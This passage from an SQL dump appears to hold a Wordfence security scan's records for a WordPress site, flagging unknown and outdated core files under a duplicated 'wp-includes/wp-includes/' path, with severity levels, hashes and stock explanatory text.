file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/admin-bar.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26618,1631424858,1631424858,'new','knownfile',75,'3b46bc8bb33d1b1032329f894d52cf72','88c0390e71e7df00770b8c188e102f66','Unknown file in WordPress core: wp-includes/wp-includes/assets/script-loader-packages.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/assets/script-loader-packages.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26619,1631424858,1631424858,'new','knownfile',75,'d9caf0a40a083a40ed9885f758fc2db2','4ce7b5fbccdc4ea6508f019aaa2d4a6f','Unknown file in WordPress core: wp-includes/wp-includes/atomlib.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/atomlib.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26620,1631424858,1631424858,'new','knownfile',75,'4987a69b395890694811ce3276a7f711','cfe0f5beed63473331ce334269db9ba7','Unknown file in WordPress core: wp-includes/wp-includes/author-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/author-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26621,1631424858,1631424858,'new','knownfile',25,'7a67fb7d62a2d140558937b4a40c8cb4','292f46dc736af71864f8c9d944f56e2b','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/heading-paragraph.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/block-patterns/heading-paragraph.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26622,1631424858,1631424858,'new','knownfile',25,'22ebc84c8bc70b67d5914c8ac70ca3a1','bae0f138baef6ec63fcf73ea2b33a96e','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/large-header-button.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/block-patterns/large-header-button.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26623,1631424858,1631424858,'new','knownfile',25,'62b8e209c00493300f47c8301affcc6d','e14d16c267099c3a27e0911fd3b99741','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/large-header.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/block-patterns/large-header.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26624,1631424858,1631424858,'new','knownfile',25,'236db4a0a931e0d0010459c6917b1393','4a3f9b236f50be45184599aa853414e7','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/quote.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/block-patterns/quote.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26625,1631424858,1631424858,'new','knownfile',25,'3c3ba027c1c86604b180b2acf41ac2a8','ccd6ca842052cae179251ed012e72b0b','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/text-three-columns-buttons.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/block-patterns/text-three-columns-buttons.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26626,1631424858,1631424858,'new','knownfile',25,'48b2c6ea393e45a44ed2e1e3449f834a','ff9dfec2cac24ff6e5c2e0e86d08c74e','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/text-two-columns-with-images.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/block-patterns/text-two-columns-with-images.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26627,1631424858,1631424858,'new','knownfile',25,'03b9293c9616b512a89eb5ca91840fa0','3a10a93f500c2254e5d386b4d3a320f3','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/text-two-columns.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/block-patterns/text-two-columns.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26628,1631424858,1631424858,'new','knownfile',25,'2a018cccd9ccfac90d901615fe9abc0a','4b41c9a15bdd1c0543302be060b13249','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/three-buttons.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/block-patterns/three-buttons.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26629,1631424858,1631424858,'new','knownfile',25,'747be7afd721d86fc25e80f84e649fd4','e028bf0f23586ea90a428071fb8b487b','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/two-buttons.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/block-patterns/two-buttons.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26630,1631424858,1631424858,'new','knownfile',25,'79ea84b434e3ccbbbf710472acd431b0','950b3ebe13ea253e980941b8264eec25','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/two-images.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/block-patterns/two-images.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26631,1631424858,1631424858,'new','knownfile',75,'db267161e88b434b6af28cbc799f2cee','3f00e183862298e1083fe0fe01ddb6a6','Unknown file in WordPress core: wp-includes/wp-includes/block-patterns.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/block-patterns.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26632,1631424859,1631424859,'new','knownfile',75,'bf1e782e9d1da548247850458b02d61e','3ac2a032f712b1faa833b42514d2598b','Unknown file in WordPress core: wp-includes/wp-includes/block-supports/align.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/block-supports/align.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26633,1631424859,1631424859,'new','knownfile',75,'ce60cb817e74ed86e7c8428d3a338f25','9aae5c506256ab28897fec572525a3ef','Unknown file in WordPress core: wp-includes/wp-includes/block-supports/colors.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/block-supports/colors.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26634,1631424859,1631424859,'new','knownfile',75,'ac45ec258bdd7f42376c0dfc5dfacf5f','13dd4cb9464bcf9f46d4da2d5b749c1e','Unknown file in WordPress core: wp-includes/wp-includes/block-supports/custom-classname.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/block-supports/custom-classname.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26635,1631424859,1631424859,'new','knownfile',75,'ab1c5c7bcf7556dbe28a56b3934d4d45','28b861d95f5856eb5f5f42dbfa9dda82','Unknown file in WordPress core: wp-includes/wp-includes/block-supports/generated-classname.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/block-supports/generated-classname.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26636,1631424859,1631424859,'new','knownfile',75,'85508953e62a9fa47148d0d28319c41e','cdad1169083bb93ab41a585817b0ee03','Unknown file in WordPress core: wp-includes/wp-includes/block-supports/typography.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/block-supports/typography.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26637,1631424859,1631424859,'new','knownfile',75,'31eefc730fdcc5f7c4ab4b9363f4d9f3','4abfc249cbcb342befe04a3c1762c283','Unknown file in WordPress core: wp-includes/wp-includes/blocks/archives/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/blocks/archives/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26638,1631424859,1631424859,'new','knownfile',75,'b8864dcfb3563c5ecadc483ce9a08f9a','b16554901e1afef5fda1714ff47add5b','Unknown file in WordPress core: wp-includes/wp-includes/blocks/archives.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/blocks/archives.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26639,1631424859,1631424859,'new','knownfile',75,'e2d0db66d703c9f8024b9503c8847a17','ab4d759c7a9e6dd7a79340c622e079e3','Unknown file in WordPress core: wp-includes/wp-includes/blocks/audio/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/audio/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26640,1631424859,1631424859,'new','knownfile',75,'bf797d5613a6faecb195c0c57327bddf','a75ce4f4e216f9acadc71f77886779aa','Unknown file in WordPress core: wp-includes/wp-includes/blocks/block/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/block/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26641,1631424859,1631424859,'new','knownfile',75,'b14a2baea5784c3d72543efe657ab438','0b3c1205a5ab9cd7b7fbbec0d305b7bc','Unknown file in WordPress core: wp-includes/wp-includes/blocks/block.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/blocks/block.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26642,1631424859,1631424859,'new','knownfile',75,'2b2b811986f19d6d9dd6876427bc259d','ae86bd6f57f45d475821154e35b9f7aa','Unknown file in WordPress core: wp-includes/wp-includes/blocks/button/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/blocks/button/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26643,1631424859,1631424859,'new','knownfile',75,'00ae959ba03b5768913a2e80e5f5ad77','c54841cc646b93498fb38719f785653f','Unknown file in WordPress core: wp-includes/wp-includes/blocks/buttons/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/blocks/buttons/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26644,1631424859,1631424859,'new','knownfile',75,'3bdd623e8c1d7018d9ef9e4fa5939339','75499d0fcb9a95271e4703709ed4adb6','Unknown file in WordPress core: wp-includes/wp-includes/blocks/calendar/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/blocks/calendar/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26645,1631424859,1631424859,'new','knownfile',75,'46a6097faf11d4af8c283f92addec3a6','24f0d94eafdc9f610e55c5ff4996f50c','Unknown file in WordPress core: wp-includes/wp-includes/blocks/calendar.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/blocks/calendar.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26646,1631424860,1631424860,'new','knownfile',75,'bbed5f8230a1f12aacd4622f0ffed0e6','8d24f57d9d3570d050e5a6bbd41929fd','Unknown file in WordPress core: wp-includes/wp-includes/blocks/categories/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/blocks/categories/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26647,1631424860,1631424860,'new','knownfile',75,'312daf0dc3be71ea7002dfef42c582aa','e36363e97d57bcc14f487a93a0bf61d3','Unknown file in WordPress core: wp-includes/wp-includes/blocks/categories.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/blocks/categories.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26648,1631424860,1631424860,'new','knownfile',75,'2fb74ee0aa43b8fcd1089d7a2e818158','1bf1af0357e3df1a87d49622a02d9d32','Unknown file in WordPress core: wp-includes/wp-includes/blocks/code/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/blocks/code/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26649,1631424860,1631424860,'new','knownfile',75,'c69e6ded18964ab230f11e0cdaa54556','4f90806a246904af5b31fb3a4ff72c0c','Unknown file in WordPress core: wp-includes/wp-includes/blocks/column/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/blocks/column/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26650,1631424860,1631424860,'new','knownfile',75,'0511d1c1bcbd28cc1c97ff9982dc0b93','f626ff7bb08c7c08a18f15b008a6638c','Unknown file in WordPress core: wp-includes/wp-includes/blocks/columns/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/blocks/columns/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26651,1631424860,1631424860,'new','knownfile',75,'b87e0e711845fd23b829680a8ff5f8d6','0ab8fe8ce014099aad8858e0edfa6455','Unknown file in WordPress core: wp-includes/wp-includes/blocks/embed/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/embed/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26652,1631424860,1631424860,'new','knownfile',75,'3079d1e83371793468dfb76f51e9338d','6b9d06270747cc51ef449fa2129a5654','Unknown file in WordPress core: wp-includes/wp-includes/blocks/file/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/blocks/file/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26653,1631424860,1631424860,'new','knownfile',75,'2f76e1fca2b863dafdf9163b6ef9b21a','eaea4d8e776fa75cd111d0179b8bfa0b','Unknown file in WordPress core: wp-includes/wp-includes/blocks/freeform/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/blocks/freeform/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26654,1631424860,1631424860,'new','knownfile',75,'18bc46b1221c6ec3dcd06166d1e4d813','fa889916e3c11dec056443d2b58ab817','Unknown file in WordPress core: wp-includes/wp-includes/blocks/gallery/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/blocks/gallery/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26655,1631424860,1631424860,'new','knownfile',75,'93bd26e45de6d181eca61aacbf2b9719','dc136b8ba41e71c2a6a18b62bd58c93a','Unknown file in WordPress core: wp-includes/wp-includes/blocks/group/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/group/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26656,1631424860,1631424860,'new','knownfile',75,'14736d6e45156efa0e95f3e5ebf81de5','3ca75b855fde77be92d0444b2309bd57','Unknown file in WordPress core: wp-includes/wp-includes/blocks/heading/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/blocks/heading/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26657,1631424860,1631424860,'new','knownfile',75,'57ab946fcfe17c2d6a6dc1d783fcbdf6','99260370d7af4cd1c2687f44789f8faf','Unknown file in WordPress core: wp-includes/wp-includes/blocks/html/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/blocks/html/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26658,1631424860,1631424860,'new','knownfile',75,'213bd7df9668b5b3d64149129a6900b1','89ac4402024502c8cb9bfb5205601a4c','Unknown file in WordPress core: wp-includes/wp-includes/blocks/image/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/image/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(26659,1631424860,1631424860,'new','knownfile',75,'e2618b136d3ddcad8b37dfd9c0e6d1b0','c6a351a22c8bf5d4e73d9bc6866cbf58','Unknown file in WordPress core: wp-includes/wp-includes/blocks/index.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 